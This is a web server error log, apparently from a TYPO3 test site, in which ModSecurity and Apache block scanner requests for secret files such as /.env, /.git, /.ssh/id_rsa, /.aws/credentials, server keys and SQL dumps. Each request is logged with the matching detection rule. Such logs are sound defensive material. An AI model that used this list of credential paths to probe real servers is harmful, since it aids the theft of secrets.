[Wed Apr 24 02:46:55.710540 2024] [:error] [pid 2737954] [client 91.215.85.29:48222] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "ZihWfyfmXL2PGiZosQ-khQAAAAs"]
[Wed May 08 09:53:22.168773 2024] [authz_core:error] [pid 3051245] [client 193.233.49.207:58006] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun May 26 10:36:41.537632 2024] [authz_core:error] [pid 3489264] [client 138.197.191.87:33930] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Sun May 26 10:36:42.050365 2024] [:error] [pid 3489277] [client 138.197.191.87:33968] [client 138.197.191.87] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZlL0mhhqbTG75Ca5Kbdc3wAAABU"]
[Sun May 26 10:36:42.050975 2024] [:error] [pid 3489277] [client 138.197.191.87:33968] [client 138.197.191.87] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZlL0mhhqbTG75Ca5Kbdc3wAAABU"]
[Sun May 26 10:36:42.051414 2024] [:error] [pid 3489277] [client 138.197.191.87:33968] [client 138.197.191.87] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZlL0mhhqbTG75Ca5Kbdc3wAAABU"]
[Sun May 26 10:36:42.108206 2024] [:error] [pid 3489276] [client 138.197.191.87:33984] [client 138.197.191.87] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZlL0mk4Bh-eti52n9YLY-gAAABQ"]
[Sun May 26 10:36:42.108954 2024] [:error] [pid 3489276] [client 138.197.191.87:33984] [client 138.197.191.87] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZlL0mk4Bh-eti52n9YLY-gAAABQ"]
[Sun May 26 10:36:42.109552 2024] [:error] [pid 3489276] [client 138.197.191.87:33984] [client 138.197.191.87] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZlL0mk4Bh-eti52n9YLY-gAAABQ"]
[Sun May 26 10:36:42.163513 2024] [authz_core:error] [pid 3489275] [client 138.197.191.87:34000] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun May 26 10:37:07.029038 2024] [authz_core:error] [pid 3489229] [client 34.222.118.220:46316] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon May 27 08:38:32.979057 2024] [authz_core:error] [pid 3503584] [client 109.202.99.41:43369] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/database.sql
[Mon May 27 08:38:32.981092 2024] [authz_core:error] [pid 3503316] [client 109.202.99.41:65053] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/dump.sql
[Mon May 27 08:38:32.992857 2024] [:error] [pid 3503317] [client 109.202.99.41:20807] [client 109.202.99.41] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "ZlQqaLeHcrnEyUP-KmdMUQAAAAI"]
[Mon May 27 08:38:32.993299 2024] [:error] [pid 3503317] [client 109.202.99.41:20807] [client 109.202.99.41] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "ZlQqaLeHcrnEyUP-KmdMUQAAAAI"]
[Mon May 27 08:38:32.993567 2024] [:error] [pid 3503317] [client 109.202.99.41:20807] [client 109.202.99.41] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "ZlQqaLeHcrnEyUP-KmdMUQAAAAI"]
[Mon May 27 08:38:32.993637 2024] [:error] [pid 3503551] [client 109.202.99.41:65355] [client 109.202.99.41] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "ZlQqaOCgixF5VxaK8VcQBAAAAAY"]
[Mon May 27 08:38:32.993765 2024] [:error] [pid 3503551] [client 109.202.99.41:65355] [client 109.202.99.41] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "ZlQqaOCgixF5VxaK8VcQBAAAAAY"]
[Mon May 27 08:38:32.993936 2024] [:error] [pid 3503551] [client 109.202.99.41:65355] [client 109.202.99.41] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "ZlQqaOCgixF5VxaK8VcQBAAAAAY"]
[Mon May 27 08:38:32.994111 2024] [:error] [pid 3503551] [client 109.202.99.41:65355] [client 109.202.99.41] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "ZlQqaOCgixF5VxaK8VcQBAAAAAY"]
[Mon May 27 08:38:32.995659 2024] [:error] [pid 3503583] [client 109.202.99.41:46797] [client 109.202.99.41] ModSecurity: Warning. Matched phrase ".kube/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .kube/ found within REQUEST_FILENAME: /.kube/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "ZlQqaPjVBApZEU18M_yxZgAAAAs"]
[Mon May 27 08:38:32.995820 2024] [:error] [pid 3503583] [client 109.202.99.41:46797] [client 109.202.99.41] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "ZlQqaPjVBApZEU18M_yxZgAAAAs"]
[Mon May 27 08:38:32.995974 2024] [:error] [pid 3503583] [client 109.202.99.41:46797] [client 109.202.99.41] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "ZlQqaPjVBApZEU18M_yxZgAAAAs"]
[Mon May 27 08:38:32.997349 2024] [:error] [pid 3503318] [client 109.202.99.41:42889] [client 109.202.99.41] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/server.key"] [unique_id "ZlQqaCVVUc8jtkqDo5ppqgAAAAM"]
[Mon May 27 08:38:32.997591 2024] [:error] [pid 3503318] [client 109.202.99.41:42889] [client 109.202.99.41] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/server.key"] [unique_id "ZlQqaCVVUc8jtkqDo5ppqgAAAAM"]
[Mon May 27 08:38:32.997761 2024] [:error] [pid 3503318] [client 109.202.99.41:42889] [client 109.202.99.41] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/server.key"] [unique_id "ZlQqaCVVUc8jtkqDo5ppqgAAAAM"]
[Mon May 27 08:38:33.095721 2024] [:error] [pid 3503316] [client 109.202.99.41:50187] [client 109.202.99.41] ModSecurity: Warning. Matched phrase ".ssh/id_rsa" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .ssh/id_rsa found within REQUEST_FILENAME: /.ssh/id_rsa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "ZlQqaQKYEGVFslPCmkSyIAAAAAE"]
[Mon May 27 08:38:33.096212 2024] [:error] [pid 3503316] [client 109.202.99.41:50187] [client 109.202.99.41] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "ZlQqaQKYEGVFslPCmkSyIAAAAAE"]
[Mon May 27 08:38:33.096659 2024] [:error] [pid 3503316] [client 109.202.99.41:50187] [client 109.202.99.41] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "ZlQqaQKYEGVFslPCmkSyIAAAAAE"]
[Mon May 27 08:38:33.107012 2024] [authz_core:error] [pid 3503583] [client 109.202.99.41:38101] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup.sql
[Mon May 27 08:38:33.121509 2024] [:error] [pid 3503319] [client 109.202.99.41:12313] [client 109.202.99.41] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "ZlQqaVCy82iAIbN4OsijlwAAAAQ"]
[Mon May 27 08:38:33.121750 2024] [:error] [pid 3503319] [client 109.202.99.41:12313] [client 109.202.99.41] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "ZlQqaVCy82iAIbN4OsijlwAAAAQ"]
[Mon May 27 08:38:33.121916 2024] [:error] [pid 3503319] [client 109.202.99.41:12313] [client 109.202.99.41] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "ZlQqaVCy82iAIbN4OsijlwAAAAQ"]
[Mon May 27 08:38:33.125041 2024] [:error] [pid 3503570] [client 109.202.99.41:44981] [client 109.202.99.41] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "ZlQqaenSGl6oHSQsupxWgQAAAAg"]
[Mon May 27 08:38:33.125213 2024] [:error] [pid 3503570] [client 109.202.99.41:44981] [client 109.202.99.41] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "ZlQqaenSGl6oHSQsupxWgQAAAAg"]
[Mon May 27 08:38:33.125358 2024] [:error] [pid 3503570] [client 109.202.99.41:44981] [client 109.202.99.41] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "ZlQqaenSGl6oHSQsupxWgQAAAAg"]
[Mon May 27 08:38:33.186084 2024] [:error] [pid 3503316] [client 109.202.99.41:65397] [client 109.202.99.41] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZlQqaQKYEGVFslPCmkSyIQAAAAE"]
[Mon May 27 08:38:33.186299 2024] [:error] [pid 3503316] [client 109.202.99.41:65397] [client 109.202.99.41] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZlQqaQKYEGVFslPCmkSyIQAAAAE"]
[Mon May 27 08:38:33.186446 2024] [:error] [pid 3503316] [client 109.202.99.41:65397] [client 109.202.99.41] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZlQqaQKYEGVFslPCmkSyIQAAAAE"]
[Mon May 27 08:38:33.194462 2024] [authz_core:error] [pid 3503583] [client 109.202.99.41:6643] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yml
[Mon May 27 08:38:33.197530 2024] [:error] [pid 3503570] [client 109.202.99.41:53023] [client 109.202.99.41] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "ZlQqaenSGl6oHSQsupxWggAAAAg"]
[Mon May 27 08:38:33.197691 2024] [:error] [pid 3503570] [client 109.202.99.41:53023] [client 109.202.99.41] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/wc.db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "ZlQqaenSGl6oHSQsupxWggAAAAg"]
[Mon May 27 08:38:33.197936 2024] [:error] [pid 3503570] [client 109.202.99.41:53023] [client 109.202.99.41] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "ZlQqaenSGl6oHSQsupxWggAAAAg"]
[Mon May 27 08:38:33.198075 2024] [:error] [pid 3503570] [client 109.202.99.41:53023] [client 109.202.99.41] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "ZlQqaenSGl6oHSQsupxWggAAAAg"]
